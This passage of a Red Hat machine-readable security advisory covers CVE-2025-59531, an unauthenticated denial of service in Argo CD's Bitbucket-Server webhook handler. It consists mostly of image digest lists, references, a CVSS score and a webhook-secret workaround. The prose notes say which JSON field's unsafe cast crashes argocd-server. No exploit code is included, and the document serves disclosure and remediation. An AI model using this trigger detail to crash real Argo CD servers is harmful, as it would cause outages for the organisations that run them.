"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400935"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service vulnerability was identified in the Argo CD continuous delivery tool, which is distributed as part of Red Hat GitOps product. An unauthenticated attacker can exploit this flaw by sending a specially crafted request to the Application Programming Interface (API) webhook endpoint. This action causes the API server to crash, preventing it from restarting properly. By repeatedly targeting the server, an attacker can cause a complete service outage, making the Argo CD interface unavailable to all users. This vulnerability is only exposed in configurations where a specific webhook secret has not been set.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argocd: argocd-server: gitops: Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability was rated as Important by the Red Hat Product Security team, this happens because an unauthenticated attacker is able to cause a denial of service from the whole GitOps cluster. This vulnerability affects only clusters without a configured \u0027webhook.bitbucket.secret\u0027 configuration key, thus clusters that have this option configured are not exposed to this flaw.\n\nThis vulnerability lies in a unsafe cast when trying to retrieve the `repository.links.clone`JSON field from BitBucket-Server push request. When the unsafe cast is triggered, the goroutine created by the worker to process the request will fail within an assertion panic and, as it lacks a recovery routine, the whole argocd-server binary will be terminated. If an attacker manages to force all the argocd-server replica nodes to reach this assertion failure, a Denial of Service of the whole cluster will happen.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59531"
},
{
"category": "external",
"summary": "RHBZ#2400935",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400935"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59531",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59531"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59531",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59531"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/5c466a4e39802e059e75c0008ae7b7b8e842538f",
"url": "https://github.com/argoproj/argo-cd/commit/5c466a4e39802e059e75c0008ae7b7b8e842538f"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-f9gq-prrc-hrhc",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-f9gq-prrc-hrhc"
}
],
"release_date": "2025-10-01T20:49:35.428000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:47:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17730"
},
{
"category": "workaround",
"details": "If a BitBucket repository is being used by GitOps it\u0027s possible to mitigate this vulnerability by setting up a BitBucket webhook secret to ensure only trusted parties can access the webhook endpoint.\n\nIn case BitBucket is not being used, the user can set the webhook secret to a long random value to prevent the webhook from being called:\n\n~~~\napiVersion: v1\nkind: Secret\nmetadata:\n name: argocd-secret\ntype: Opaque\ndata:\n+ webhook.bitbucketserver.secret: \u003cyour base64-encoded secret here\u003e\n~~~",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
